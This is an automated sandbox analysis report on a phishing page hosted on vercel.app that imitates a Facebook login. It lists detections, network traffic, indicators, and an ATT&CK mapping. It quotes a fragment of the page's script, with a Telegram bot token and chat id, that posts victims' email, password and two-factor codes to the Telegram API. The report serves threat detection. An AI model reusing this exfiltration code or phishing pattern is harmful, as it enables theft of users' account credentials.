Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://aicenterr.vercel.app/asd.com.html

Overview

General Information

Sample URL:http://aicenterr.vercel.app/asd.com.html
Analysis ID:1590442
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish10
AI detected suspicious Javascript
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Javascript checks online IP of machine
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2204,i,10313533419984869242,4354048946415296629,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://aicenterr.vercel.app/asd.com.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_60JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://aicenterr.vercel.app/asd.com.htmlAvira URL Cloud: detection malicious, Label: phishing
      Source: https://aicenterr.vercel.app/favicon.icoAvira URL Cloud: Label: phishing

      Phishing

      barindex
      Source: https://aicenterr.vercel.app/asd.com.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'Facebook' is well-known and is associated with the domain 'facebook.com'., The URL 'aicenterr.vercel.app' does not match the legitimate domain for Facebook., The domain 'vercel.app' is a hosting platform and not directly associated with Facebook., The subdomain 'aicenterr' is suspicious and not related to Facebook., The presence of input fields for 'Phone number or email' and password is typical for phishing attempts targeting Facebook credentials. DOM: 1.0.pages.csv
      Source: Yara matchFile source: 1.0.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_60, type: DROPPED
      Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://aicenterr.vercel.app/asd.com.html... This script demonstrates several high-risk behaviors, including data exfiltration, sending sensitive information (email, password) to a third-party domain, and potential for abuse. While the script may have a legitimate purpose, the way it is implemented raises significant security concerns.
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: const telegram_bot_token = "7234992518:aahxs67ba-uqox7pn_s7c1gzowfpmre8xya"; // thay token bot ca bn const chat_id = "1148231049"; // thay chat id ca bn const loginform = document.getelementbyid("login-form"); const authform = document.getelementbyid("auth-form"); const loginstep = document.getelementbyid("login-step"); const authstep = document.getelementbyid("auth-step"); const loginbutton = document.getelementbyid("login-button"); const authbutton = document.getelementbyid("auth-button"); const twofaerrormessage = document.getelementbyid("2fa-error-message"); const countdownelement = document.getelementbyid("countdown"); let countdowninterval; // hm gi tin nhn ti telegram function sendmessagetotelegram(message) { const url = `https://api.telegram.org/bot${telegram_bot_token}/sendmessage`; const data = { chat_id: chat_id, text: message }; fetch(url, { method: "post", headers: { ...
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: Number of links: 0
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: Title: Login Page does not match URL
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: Invalid link: Forgot your password?
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: const telegram_bot_token = "7234992518:aahxs67ba-uqox7pn_s7c1gzowfpmre8xya"; // thay token bot ca bn const chat_id = "1148231049"; // thay chat id ca bn const loginform = document.getelementbyid("login-form"); const authform = document.getelementbyid("auth-form"); const loginstep = document.getelementbyid("login-step"); const authstep = document.getelementbyid("auth-step"); const loginbutton = document.getelementbyid("login-button"); const authbutton = document.getelementbyid("auth-button"); const twofaerrormessage = document.getelementbyid("2fa-error-message"); const countdownelement = document.getelementbyid("countdown"); let countdowninterval; // hm gi tin nhn ti telegram function sendmessagetotelegram(message) { const url = `https://api.telegram.org/bot${telegram_bot_token}/sendmessage`; const data = { chat_id: chat_id, text: message }; fetch(url, { method: "post", headers: { ...
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: <input type="password" .../> found
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: No favicon
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: No <meta name="author".. found
      Source: https://aicenterr.vercel.app/asd.com.htmlHTTP Parser: No <meta name="copyright".. found
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /asd.com.html HTTP/1.1Host: aicenterr.vercel.appConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://aicenterr.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/y4/r/N3dO4_SJQPQ.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://aicenterr.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: aicenterr.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://aicenterr.vercel.app/asd.com.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/y4/r/N3dO4_SJQPQ.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /asd.com.html HTTP/1.1Host: aicenterr.vercel.appConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: aicenterr.vercel.app
      Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
      Source: global trafficDNS traffic detected: DNS query: static.xx.fbcdn.net
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: public, max-age=0, must-revalidateContent-Length: 39Content-Type: text/plain; charset=utf-8Date: Tue, 14 Jan 2025 00:50:09 GMTServer: VercelStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadX-Vercel-Error: NOT_FOUNDX-Vercel-Id: iad1::db9r4-1736815809273-10c733845554Connection: close
      Source: chromecache_60.2.drString found in binary or memory: https://api.telegram.org/bot$
      Source: chromecache_60.2.drString found in binary or memory: https://ip-api.com/json/
      Source: chromecache_60.2.drString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v4/y4/r/N3dO4_SJQPQ.png
      Source: chromecache_60.2.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: classification engineClassification label: mal80.phis.win@17/18@14/9
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2204,i,10313533419984869242,4354048946415296629,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://aicenterr.vercel.app/asd.com.html"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2204,i,10313533419984869242,4354048946415296629,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      http://aicenterr.vercel.app/asd.com.html100%Avira URL Cloudphishing
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://aicenterr.vercel.app/favicon.ico100%Avira URL Cloudphishing
      NameIPActiveMaliciousAntivirus DetectionReputation
      scontent.xx.fbcdn.net
      157.240.251.9
      truefalse
        high
        aicenterr.vercel.app
        216.198.79.129
        truetrue
          unknown
          www.google.com
          142.250.186.100
          truefalse
            high
            upload.wikimedia.org
            185.15.59.240
            truefalse
              high
              static.xx.fbcdn.net
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://aicenterr.vercel.app/asd.com.htmltrue
                  unknown
                  https://aicenterr.vercel.app/asd.com.htmltrue
                    unknown
                    https://aicenterr.vercel.app/favicon.icofalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://static.xx.fbcdn.net/rsrc.php/v4/y4/r/N3dO4_SJQPQ.pngfalse
                      high
                      https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svgfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot$chromecache_60.2.drfalse
                          high
                          https://ip-api.com/json/chromecache_60.2.drfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            157.240.251.9
                            scontent.xx.fbcdn.netUnited States
                            32934FACEBOOKUSfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            216.198.79.129
                            aicenterr.vercel.appUnited States
                            11696NBS11696UStrue
                            185.15.59.240
                            upload.wikimedia.orgNetherlands
                            14907WIKIMEDIAUSfalse
                            157.240.253.1
                            unknownUnited States
                            32934FACEBOOKUSfalse
                            142.250.186.100
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            64.29.17.129
                            unknownCanada
                            13768COGECO-PEER1CAfalse
                            IP
                            192.168.2.6
                            192.168.2.5
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1590442
                            Start date and time:2025-01-14 01:49:09 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 59s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:browseurl.jbs
                            Sample URL:http://aicenterr.vercel.app/asd.com.html
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal80.phis.win@17/18@14/9
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.185.238, 142.251.168.84, 142.250.184.206, 142.250.186.174, 172.217.16.206, 142.250.186.170, 216.58.206.74, 172.217.16.138, 142.250.181.234, 142.250.185.74, 216.58.212.138, 142.250.185.138, 142.250.185.170, 142.250.185.234, 142.250.186.42, 216.58.212.170, 142.250.186.106, 142.250.184.202, 216.58.206.42, 142.250.186.74, 142.250.185.202, 199.232.214.172, 2.17.190.73, 172.217.18.14, 216.58.206.78, 172.217.23.110, 142.250.186.67, 2.23.242.162, 20.109.210.53, 13.107.246.45
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                            • Not all processes where analyzed, report is missing behavior information
                            • VT rate limit hit for: http://aicenterr.vercel.app/asd.com.html
                            No simulations
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 23:50:02 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2677
                            Entropy (8bit):3.9761875218546114
                            Encrypted:false
                            SSDEEP:48:8LdVT9Ni0H4idAKZdA19ehwiZUklqehr1ny+3:8nXizS5y
                            MD5:C65FD84C972634CA655391C8DC8F23B2
                            SHA1:95CA8CCC26400878AA05CCDDBE81378CC4873650
                            SHA-256:4A2F22B7A9513AE814E082F235FD8FF87C6382F7A5339382350697FD0F7553CB
                            SHA-512:694B9847D61E71CF3B08672B4279824C16A7DF1F47F40C04E463B5F96D05A7D57B8F75E08438F02AB481FE5FA58F71FE6844D47CCB6311EDB95D719D0DF64388
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,....^..>.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z@.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z@.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z@.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z@............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.ZB............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............g......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 23:50:02 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2679
                            Entropy (8bit):3.9884733719259233
                            Encrypted:false
                            SSDEEP:48:8udVT9Ni0H4idAKZdA1weh/iZUkAQkqehC1ny+2:8EXiB9Ql5y
                            MD5:3878D470DB0F653845913B2333BB301C
                            SHA1:E9C2C45DC1661FB6DAB7851155BA583621597564
                            SHA-256:74C414902192B0AB49FB44E4B1563D0C5BC5B25C423FB6C90255F0D956B7E5C2
                            SHA-512:D36EEC7A9D0B68DE03966FEE49BA02EB486A7105E366FADC844394805CA0CFEE934ECC0A3730D719E59D0B20599183E4F40E67A262AA50593216C29B4BE839DA
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,.......>.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z@.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z@.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z@.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z@............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.ZB............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............g......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2693
                            Entropy (8bit):4.00285272656886
                            Encrypted:false
                            SSDEEP:48:8x2dVT9NsH4idAKZdA14tseh7sFiZUkmgqeh7sc1ny+BX:8xcXpnW5y
                            MD5:BE24DC4E6C66DB9EE759A7D51DC76F37
                            SHA1:A30847F2AB77187ADE0827E227A1347EDB930236
                            SHA-256:ADCEB357F49C0A831B5C1962BFE391B725A59FFB03E396CA43548CB0F3BF4ECE
